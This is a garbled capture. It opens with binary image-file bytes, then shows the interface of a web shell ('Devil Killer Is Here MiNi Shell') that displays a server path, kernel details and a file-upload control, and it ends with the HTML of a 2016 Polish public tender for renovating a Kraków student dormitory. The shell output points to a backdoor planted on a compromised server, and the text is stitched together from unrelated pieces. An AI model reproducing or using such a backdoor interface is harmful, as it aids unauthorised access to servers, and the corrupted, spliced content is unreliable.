JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20161013/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20161013/323266-N-2016.html

<BR/><p>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia (jeżeli dotyczy):  </p><a class='base announcementNumber' href='' target='_blank'></a><br/><hr class='linkedItemsSeparator' /><div class="divRow_xforms"><div>
              Ogłoszenie nr 323266 - 2016
              z dnia 2016-10-13 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Kraków:  Kompleksowy remont i przebudowa Domu  Studenckiego  nr  2 Akademii  Wychowania Fizycznego przy al. Jana Pawła II 82 w Krakowie na działce 7/18  obr.52 jedn. ewid. Nowa Huta w celu dostosowania do  obowiązujących    przepisów  p-pożarowych  i  technicznych<br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Roboty budowlane
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><br /><b>Nazwa projektu lub programu</b><br /></div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Akademia Wychowania Fizycznego im.Bronisława Czecha, krajowy numer identyfikacyjny
              32784700000, ul.
              al. Jana Pawła II 
              78,
              31571  
              Kraków, woj.
              małopolskie, państwo
              Polska, tel.
              012 683 15 16, e-mail
              , faks
              012 648 12 10.
              <br />
              Adres strony internetowej (URL): www.awf.krakow.pl <br /><br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Inny: Uczelnia Wyższa </div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  tak
                <br />www.awf.krakow.pl </div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  tak
                  <br />
                  Inny sposób:
                  <br />za pośrednictwem operatora pocztowego w rozumieniu ustawy z dnia 23 listopada 2012 r.  Prawo pocztowe (Dz. U. z 2012 r. poz. 1529 oraz z 2015 r. poz. 1830), osobiście, za pośrednictwem posłańca. <br />
                Adres:
                <br /> Sekcja Zamówień Publicznych AWF- AL.Jana Pawła II 78 kRAKÓW, POKÓJ 305 III piętro </div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b> Kompleksowy remont i przebudowa Domu  Studenckiego  nr  2 Akademii  Wychowania Fizycznego przy al. Jana Pawła II 82 w Krakowie na działce 7/18  obr.52 jedn. ewid. Nowa Huta w celu dostosowania do  obowiązujących    przepisów  p-pożarowych  i  technicznych<br /><b>Numer referencyjny: </b>K-2/22/2016<br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                roboty budowlane
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Nie
                </div><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>Wspólny Słownik Zamówień: 45000000-7 - Roboty budowlane, 45310000-3 - Roboty instalacyjne elektryczne, 45332000-3 - Roboty instalacyjne wodne i kanalizacyjne 
Przedmiotem niniejszej umowy objęte są następujące roboty budowlane:
Branża  instalacyjna  sanitarna:
1.	Demontaż wszystkich instalacji  sanitarnych  wraz z  osprzętem
2.	Instalacja  kanalizacji  deszczowej - całość  zgodnie z projektem  wykonawczym
3.	Instalacja  kanalizacji  sanitarnej :
a.	Piony : PKs 5 , PKs6 , PKs7, PKs 8 , PKs9 , PKs14, PKs15, PKs16, PKs17 
b.	Poziomy w  całości -kondygnacja  -2
c.	Osprzęt  sanitarny  dla  78  pokoi + 1 pokój  rodzinny kondygnacja  od  2 do  11 
d.	Osprzęt  sanitarny  dla  wyposażenia  kuchni    kondygnacja   od 2 do 11
e.	Osprzęt  sanitarny  dla  wyposażenia wszystkich  pomieszczeń   kondygnacja   -1 i 0 
4.	Instalacja  wody  zimnej . c.w.u , cyrkulacji:
a.	Piony  PW5 , PW6 , PW7 , PW8 , PW9
b.	Poziomy w  całości -kondygnacja  -2
c.	Osprzęt  sanitarny  dla  78  pokoi + 1 pokój  rodzinny kondygnacja   od  2 do  11 
d.	Osprzęt  sanitarny  dla  wyposażenia  kuchni    kondygnacja   od 2 do 11
e.	Osprzęt  sanitarny  dla  wyposażenia wszystkich  pomieszczeń   kondygnacja   -1 i 0 
5.	Wentylacja  mechaniczna  nawiewno-wywiewna :
a.	Centrala  wentylacyjna  NW1 + kanały  + osprzęt 
b.	Wentylator wywiewny - 6Wt2 + kanały  + osprzęt
c.	Wentylator łazienkowy - 1Wt4+ kanały  + osprzęt
d.	Wentylator kanałowy-1Wt1+ kanały  + osprzęt
e.	Wentylator kanałowy-1Wt2 , 1Wt3+ kanały  + osprzęt
f.	Wentylator dachowy - 7Wt1+ kanały  + osprzęt
6.	Wentylacja  p-pożarowa (wentylacja napowietrzania i oddymiania  ) całość  zgodnie z projektem  wykonawczym
7.	Instalacja  centralnego ogrzewania  całość  zgodnie z projektem  wykonawczym  (  za  wyjątkiem  zasilania  nagrzewnic  - tylko dla  centrali  NW1)
Branża  elektryczna:
1.	Instalacja  elektryczna:
a.	Demontaż wszystkich instalacji  elektrycznych ( osprzęt + kable )  bez  ZELP
b.	Wymiana  złącze  kablowego
c.	Wymiana  rozdzielnic  głównych  poz. -1
d.	Tablice  administracyjne ( TA-00, TA-B , TA-02 do TA-11 , TA-12 , TA-13)
e.	Tablice  dedykowane ( TS, TAP , TU-1 , TU-2 , TU-3 , TU-4 , TGM-1 , TGM -2 , TGM -3, TS , TWC, TWD2 )
f.	Rozbudowa istniejących   tablic  piętrowych  ZELP
g.	Remont  istniejących ZELP
h.	Skrzynki  pokojowe  na  piętrach ( TZS, TPN, TB1 , TB2)
Rury  i  kanały   instalacyjne  dla  instalacji  elektrycznej , SAP , DSO , okablowania  strukturalnego , CCTV , RTV , domofonów dla  kondygnacji  -2, -1 , 0  oraz  od 2 do 11  (dla  78  pokoi + 1 pokój  rodzinny +korytarze i klatka  schodowa)
i.	Kable  elektryczne  zasilające dla  kondygnacji  -2, -1 , 0  oraz  od 2 do 11
j.	Instalacja  oświetleniowa  dla  kondygnacji  -2, -1 , 0  oraz  od 2 do 11 (dla  78  pokoi + 1 pokój  rodzinny  +korytarze i klatka  schodowa)
k.	Wykonanie  okablowania elektrycznego  dla  kondygnacji  -2, -1 , 0  oraz  od 2 do 11  (dla  78  pokoi + 1 pokój  rodzinny  +korytarze i klatka  schodowa)
l.	Osprzęt  elektryczny  dla  kondygnacji  -2, -1 , 0  oraz  od 2 do 11 (dla  78  pokoi + 1 pokój  rodzinny  +korytarze i klatka  schodowa)
m.	Oprawy  oświetlenia  awaryjnego i ewakuacyjnego  dla  kondygnacji  -2, -1 , 0  
oraz  od 2 do 11 (dla  78  pokoi + 1 pokój  rodzinny +korytarze i klatka  schodowa )
Monitorowanie  opraw  awaryjnych dla  kondygnacji  -2, -1 , 0  oraz  od 2 do 11  (dla  78  pokoi + 1 pokój  rodzinny  +korytarze i klatka  schodowa)
n.	Instalacja  odgromowa  i  wyrównawcza
2.	Instalacja  elektryczna  niskoprądowa 
a.	Demontaż wszystkich instalacji  niskoprądowych  wraz z  osprzętem
b.	Instalacja  dźwiękowego  systemu  ostrzegawczego  ( DSO ) całość  zgodnie z projektem  wykonawczym
c.	Instalacja  kontroli  dostępu   całość  zgodnie z projektem  wykonawczym
d.	Instalacja  sygnalizacji  pożaru  (SAP)  całość  zgodnie z projektem  wykonawczym
e.	Instalacja  okablowania  strukturalnego - dla  kondygnacji  -2, -1 , 0  oraz  od 2 do 11  (dla  78  pokoi + 1 pokój  rodzinny )  - bez  urządzeń  aktywnych
f.	Monitoring  poziomu  wody w  zbiorniku
Branża  Budowlana:
1.	Demontaże  i  rozbiórki ( wyburzenia  we wszystkich pomieszczeniach) :
a.	Rozbiórka  ścianek  działowych  ceglanych
b.	Rozbiórka  kominów  żelbetowych  wentylacyjnych
c.	Demontaż  podokienników  okiennych
d.	Demontaż  stolarki  drzwiowej
e.	Rozbiórka  posadzki  wraz z  warstwami  izolacyjnymi  w  sanitariatach
f.	Skucie  oblicowania z  płytek  w  toaletach
g.	Rozbiórka  wykładzin  PVC
h.	Demontaż  sufitów  podwieszonych
i.	Rozbiórka  zsypu  śmieciowego
j.	Demontaż  balustrad  klatki  schodowej
k.	Rozbiórka  posadzek  loggii  i  tarasu  XII  pietra
l.	Demontaż  posadzki  parteru  oraz  warstw   podposadzkowych
m.	Demontaż  konstrukcji  stalowej na dachu
n.	Wywóz  gruzu  na  z  rozbiórki  wraz opłatą  za  składowanie  i  utylizację   gruzu
2.	Tynki  i  gładzie  gipsowe  dla  kondygnacji   -1 , 0  oraz  od 2 do 11  (dla  78  pokoi + 1 pokój  rodzinny  +korytarze i klatka  schodowa)
3.	Oblicowania  ścian płytkami  ceramicznymi dla  kondygnacji   -1 , 0  oraz  od 2 do 11  (dla  78  pokoi + 1 pokój  rodzinny )
4.	Malowanie dla  kondygnacji   -1 , 0  oraz  od 2 do 11  (dla  78  pokoi + 1 pokój  rodzinny )
5.	Warstwy  podposadzkowe  dla  kondygnacji -2,  -1 , 0  oraz  od 2 do 11  (dla  78  pokoi + 1 pokój  rodzinny )
6.	Posadzki  dla  kondygnacji  -1 , 0  oraz  od 2 do 11  (dla  78  pokoi + 1 pokój  rodzinny )
7.	Zsyp  śmieciowy  nowy
8.	Klatka schodowa  - wszystkie prace budowlane, wykończeniowe 
9.	Dach  - wykonanie  nowych przebić dla  nowych  kominów oraz  pod  ramy stalowe  oraz  naprawa  pokrycia  dachowego
10.	Parapety  okienne  wewnętrzne  dla  kondygnacji   -1 , 0  oraz  od 2 do 11  (dla  78  pokoi + 1 pokój  rodzinny )
11.	Elewacja  ( naprawa tynków , malowanie  tynków ) w  zakresie  niezbędnym
12.	Wzmocnienie  konstrukcji  ścian i  stropów:
a.	Wzmocnienie  konstrukcji  ścian i  stropów  taśmami  węglowymi
b.	Wzmocnienie  konstrukcji  ścian i  stropów kątownikami  stalowymi
c.	Ramy  stalowe  na dachu  dla  przyszłej instalacji  solarnej
d.	Wzmocnienie  stropu pod  wentylatory  nadmuchowe  poziom +14
e.	Wzmocnienie  konstrukcji  stropu  pod  wymienniki  poziom -2
f.	Montaż  elementów  stalowych  w  otworach  pod  wentylacje  oraz  nadproża  stalowe
13.	Przebicia  i  rozbiórki  ścian betonowych
a.	Poszerzenie otworów  oraz  wycinanie  otworów  w  ścianach  betonowych
b.	Przebicia  pod  wentylację w ścianie i  stropie
c.	Przebicia  w scianie i  stropie
d.	Przebicia w ścianach  i stropach  betonowych
      13. Przygotowanie   ościeży  drzwiowych  pod  montaż  drzwi  EI30
14.	Montaż  stolarki   drzwiowej dla  kondygnacji  -2, -1 , 0  oraz  od 2 do 11 (dla  78  pokoi + 1 pokój  rodzinny  +korytarze i klatka  schodowa)
15.	Ścianki  aluminiowe  dla  kondygnacji  -2, -1 , 0  oraz  od 2 do 11 (dla  78  pokoi + 1 pokój  rodzinny  +korytarze i klatka  schodowa)
16.	Okna  aluminiowe  i  PVC  dla  kondygnacji.  
17.	Ślusarka , konstrukcje  stalowe:
a.	Poręcze  zabezpieczające  na  balustradzie  balkonowej
b.	Drzwi  drewniane  
18.	Roboty  murowe  dla  kondygnacji  -2, -1 , 0  oraz  od 2 do 11 (dla  78  pokoi + 1 pokój  rodzinny  +korytarze i klatka  schodowa)
a.	Obudowa  pionów  wod-kan  
b.	Klapy  rewizyjne  p-pożarowe
c.	Ścianki  działowe
d.	Kominy  na  dachu
19.	Ścianki   i  okładziny  oraz  obudowy  z  płyt  gipsowo-kartonowych dla  kondygnacji  -2, -1 , 0  oraz  od 2 do 11 (dla  78  pokoi + 1 pokój  rodzinny  +korytarze i klatka  schodowa)
20.	Sufity  podwieszane
21.	Wyposażenie  p-pożarowe
22.	System  zamykania  pomieszczeń  Master  Key

Z  pełnego  zakresu  prac remontowych oraz  przebudowy  wyłączone  są    kondygnacje  1  oraz  12  , jak również  połowa  budynku  od  strony  południowej   ( w osiach projektowych 1-3 )  dla  kondygnacji  2-11

Roboty  zewnętrzne
1.	Instalacja  wodociągowa  zewnętrzna  I  II  strefy  pomiędzy  budynkami  DS  nr 1   i DS  nr 2
2.	Przyłącz  gazu do Pawilonu Socjalnego ( odcinek  DS.  nr 2  do  Pawilonu  Socjalnego)
3.	Rampa  dla  osób  niepełnosprawnych   zewnętrzna
4.	Śmietnik z zadaszeniem  zewnętrzny
5.	Remont  rampy  zjazdowej do śmietnika
6.	Droga pożarowa  od  strony  drogi  dojazdowej  ( strona  północna) - dojazd do okien
7.	Wykonanie  nowych  chodników
8.	Zieleń:
a.	Wycinka  drzew  i  krzewów
b.	Wykonanie trawników

Zakres rzeczowy robót określają:
Zakres rzeczowy robót określają; powyższy opis przedmiotu zamówienia, przedmiary robót, specyfikacje techniczne wykonania i odbioru robót budowlanych, SIWZ, dokumentacja projektowa, rysunki pomocnicze. 
Uwaga:
Realizacja robót nie obejmuje pełnego zakresu robót zawartego w projektach wykonawczych dołączonych do SWIZ. Wykonawstwo obejmować będzie tylko etap II czyli zakres zawarty w pkt. 2 paragrafu 2 projektu umowy oraz w przedmiarach robót i rysunkach pomocniczych.
Zamawiający  dopuszcza składanie ofert równoważnych.
<br /><br /><b>II.5) Główny kod CPV: </b>45000000-7<br /><b> Dodatkowe kody CPV:</b>45000000-7<br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              6776429<br />
              Waluta:
              <br /><div style="padding-left: 20px">pln <br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                tak
                <br />
                Określenie przedmiotu, wielkości lub zakresu oraz warunków na jakich zostaną udzielone zamówienia, o których mowa w art. 67 ust. 1 pkt 6 lub w art. 134 ust. 6 pkt 3 ustawy Pzp:
                Zamawiający przewiduje udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 ustawy Pzp.  Polegać one będą na: powtórzeniu tego samego zakresu robót, który został określony w tabeli w pkt 3.1. do 20% wartości szacunkowej zamówienia.<br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    data zakończenia: 31/07/2017<br /></div><br /><b>II.9) Informacje dodatkowe: </b></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                Zamawiający nie stawia żadnego warunku. <br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                Zamawiający nie stawia żadnego warunku. <br />
                Informacje dodatkowe
                <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                zdolności technicznej i zawodowej 
Zamawiający uzna wyżej wymieniony warunek za spełniony, jeżeli  Wykonawca wykaże, że:
a)	w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał co najmniej 2 (dwie) roboty każda na kwotę  co najmniej  7 mln zł brutto, polegające na: remoncie lub przebudowie lub budowie  budynku użyteczności publicznej lub mieszkalnego lub zamieszkania zbiorowego. 
b)	dysponuje lub będzie dysponował osobami skierowanymi przez Wykonawcę do realizacji zamówienia tj.:
	osobą która będzie pełnić funkcję kierownika budowy, posiadającą uprawnienia budowlane  do kierowania robotami budowlanymi w specjalności konstrukcyjno-budowlanej.
	osobą,  która będzie pełnić funkcję kierownika robót branży elektrycznej, posiadającą uprawnienia budowlane w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych
 i elektroenergetycznych.
	osobę, która będzie pełnić funkcję   kierownika robót branży sanitarnej posiadającą uprawnienia budowlane  w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych .
Osoby wymienione powyżej powinny posiadać odpowiednie uprawnienia budowlane do kierowania robotami budowlanymi, zgodnie z ustawą z dnia 7 lipca 1994 r. Prawo budowlane (tj. Dz. U. z 2016 r., poz. 290), rozporządzeniem Ministra Infrastruktury i Rozwoju z dnia 11 września 2014 r. w sprawie samodzielnych funkcji technicznych w budownictwie (Dz. U. 2014 r., poz. 1278) oraz ustawą z dnia 9 maja 2014 r. o ułatwieniu dostępu do wykonywania niektórych zawodów regulowanych (Dz. U. z 2014 r., poz. 768), albo odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów. Zamawiający, określając wymogi dla osoby w zakresie posiadanych uprawnień budowlanych, dopuszcza odpowiadające im uprawnienia budowlane wydane obywatelom państw Europejskiego Obszaru Gospodarczego oraz Konfederacji Szwajcarskiej, z zastrzeżeniem art. 12a oraz innych przepisów Prawa Budowlanego oraz ustawy z dnia 22 grudnia 2015 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz. U z 2016 r., poz. 65).


	osobą z wykształceniem technicznym pełniącą funkcję pomocnicze na budowie (sporządzanie harmonogramów, prowadzenie na bieżąco obmiarów robót, kompletowanie dokumentacji budowy, sporządzanie protokołów z narad koordynacyjnych itp.)
Nie dopuszcza się łączenia powyższych funkcji. 
<br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  nie
                <br />
                Informacje dodatkowe:
                </div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  tak
                  <br />
                  Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia:
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 2 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 4 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 8 ustawy Pzp)
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
